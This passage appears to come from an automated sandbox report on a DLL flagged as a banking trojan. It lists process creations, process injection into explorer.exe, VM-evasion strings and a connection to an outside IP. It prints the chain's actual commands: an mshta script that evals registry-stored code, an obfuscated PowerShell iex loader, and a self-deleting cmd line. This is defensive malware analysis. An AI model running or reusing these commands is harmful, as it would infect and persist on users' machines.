                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03480782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348BE80 NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03486DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034774AE NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03485220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03483829 NtQuerySystemInformation,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034710C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034736BB NtGetContextThread,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034764C4 memset,NtQueryInformationProcess
                      Source: xaj0e933Uv.dll | Binary or memory string: OriginalFilenamemyfile.exe$ vs xaj0e933Uv.dll
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: xaj0e933Uv.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xaj0e933Uv.dll | Virustotal: Detection: 40%
                      Source: xaj0e933Uv.dll | ReversingLabs: Detection: 47%
                      Source: xaj0e933Uv.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll"
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1"
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220504
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkorezbb.opv.ps1
                      Source: classification engine | Classification label: mal100.bank.troj.evad.winDLL@25/17@0/1
                      Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034368BD CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification
                      Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B8EF3798-B76F-AA89-016C-DB7EC5603F92}
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{F0B43100-8FC3-A2DB-9924-33F6DD98178A}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B8713496-B709-AA5B-016C-DB7EC5603F92}
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: xaj0e933Uv.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: Q5.pdb( | source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.pdb( | source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb@ | source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb | source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb | source: xaj0e933Uv.dll
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.pdb | source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP | source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Q5.pdb | source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb( | source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0343828B push ecx; ret 2_2_0343829B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03437EA0 push ecx; ret 2_2_03437EA9
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034938A0 push ecx; ret 2_2_034938A9
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03493D9F push ecx; ret 2_2_03493DAF
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03473495 push ecx; mov dword ptr [esp], 00000002h 2_2_03473496
                      Source: xaj0e933Uv.dll | Static PE information: section name: .erloc
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress
                      Source: xaj0e933Uv.dll | Static PE information: real checksum: 0x79835 should be: 0x765e4
                      Source: m5pod5s5.dll.21.dr | Static PE information: real checksum: 0x0 should be: 0xbf97
                      Source: a1gxko15.dll.24.dr | Static PE information: real checksum: 0x0 should be: 0x2015
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll

                      Hooking and other Techniques for Hiding and Protection

                      Source: Yara matchFile source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852 Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5887
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3535
                      Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0348BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0348BAD1
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_034799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_034799BC
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_034765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_034765C2
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0347FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0347FD47
                      Source: explorer.exe, 0000001D.00000000.464459722.0000000005454000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                      Source: explorer.exe, 0000001D.00000000.433226771.00000000051AC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.433299138.00000000051F7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 00000025.00000000.589637413.000001F9B9A61000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.461594936.000000000510C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: e-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                      Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000001D.00000000.433299138.00000000051F7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 0000001D.00000000.461594936.000000000510C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}on:Mondz?S
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_034786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,2_2_034786AD
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_03478FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_03478FEC

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF62CE012E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 4B0000Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF62CE012E0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 360000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2490000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 35E000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 4B0000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\control.exe base: 4B0000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe | Memory allocated: C:\Windows\explorer.exe base: 4B0000 protect: page execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 360000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 2490000 value: 80
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 35E000 value: 00
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 4B0000 value: 80
                      Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: 40
                      Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 4084
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3616
                      Source: C:\Windows\System32\control.exe | Thread register set: target process: 3616
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
